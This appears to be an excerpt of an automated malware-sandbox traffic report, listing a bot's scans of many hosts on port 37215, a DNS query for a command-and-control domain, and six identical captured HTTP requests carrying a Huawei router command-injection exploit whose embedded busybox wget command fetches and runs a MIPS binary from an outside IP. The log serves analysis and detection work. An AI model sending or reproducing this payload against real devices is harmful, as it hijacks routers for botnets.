      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 156.31.183.230:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 156.189.123.148:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 41.217.235.67:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 41.234.95.218:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 156.215.100.200:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 41.11.194.131:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 197.237.38.213:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 156.133.198.8:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 156.63.38.96:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 41.176.32.214:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 197.251.139.216:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 41.10.115.40:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 156.63.32.55:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 197.179.83.89:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 41.190.165.9:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 41.181.44.83:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 156.83.193.184:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 156.186.216.67:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 197.16.130.81:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 197.207.206.191:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 156.67.41.157:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 197.231.111.126:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 156.18.125.123:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 41.150.10.244:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 41.1.102.229:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 41.74.200.88:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 156.76.56.82:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 41.197.173.2:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 156.138.117.254:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 197.125.198.73:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 156.34.54.87:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 156.147.186.204:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 156.208.230.230:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 197.106.155.230:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 41.232.45.106:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 41.83.22.80:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 41.236.42.216:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 41.142.199.148:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 197.114.217.184:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 197.126.219.8:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 197.83.215.244:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 156.124.255.79:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 197.187.233.9:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 41.244.189.116:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 156.175.75.99:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 197.210.83.247:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 41.13.237.69:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 156.181.197.151:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 156.182.228.153:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 41.19.1.20:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 41.148.164.65:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 156.166.129.16:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 156.27.25.78:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 197.13.236.247:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 197.28.62.23:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 41.118.18.241:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 156.191.19.89:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 41.166.20.157:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 197.111.3.173:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 156.35.21.18:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 41.66.63.217:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 41.187.181.153:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 197.222.78.191:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 41.144.13.206:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 197.136.53.252:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 197.26.96.70:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 41.176.244.180:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 41.24.101.9:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 41.218.53.207:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 156.166.176.247:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 41.237.187.20:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 41.34.97.9:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 197.203.14.200:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 197.145.179.209:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 156.14.177.36:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 41.86.68.251:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 197.151.231.67:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 41.74.32.198:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 156.183.181.76:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 41.165.18.242:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 156.150.156.240:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 156.74.234.113:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 156.154.71.165:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 197.253.38.133:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 41.78.31.175:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 156.197.47.72:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 156.74.22.52:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 197.185.210.177:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 41.120.123.148:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 197.22.168.118:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 197.7.121.50:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 41.170.157.163:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 197.102.154.85:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 156.25.14.11:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 156.120.112.113:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 41.170.239.230:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 156.79.78.50:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 41.250.26.33:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 41.250.77.80:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 41.67.54.200:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 156.181.209.237:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 156.223.46.60:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 156.88.218.241:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 41.252.78.157:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 156.151.239.93:37215
      Source: global trafficTCP traffic: 192.168.2.23:52557 -> 156.230.75.199:37215
      Source: unknownDNS traffic detected: query: cnc.luxstresser.xyz replaycode: Name error (3)
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 31 37 32 2e 31 31 30 2e 32 34 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.172.110.241 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 31 37 32 2e 31 31 30 2e 32 34 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.172.110.241 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 31 37 32 2e 31 31 30 2e 32 34 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.172.110.241 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 31 37 32 2e 31 31 30 2e 32 34 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.172.110.241 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 31 37 32 2e 31 31 30 2e 32 34 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.172.110.241 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 31 37 32 2e 31 31 30 2e 32 34 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.172.110.241 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
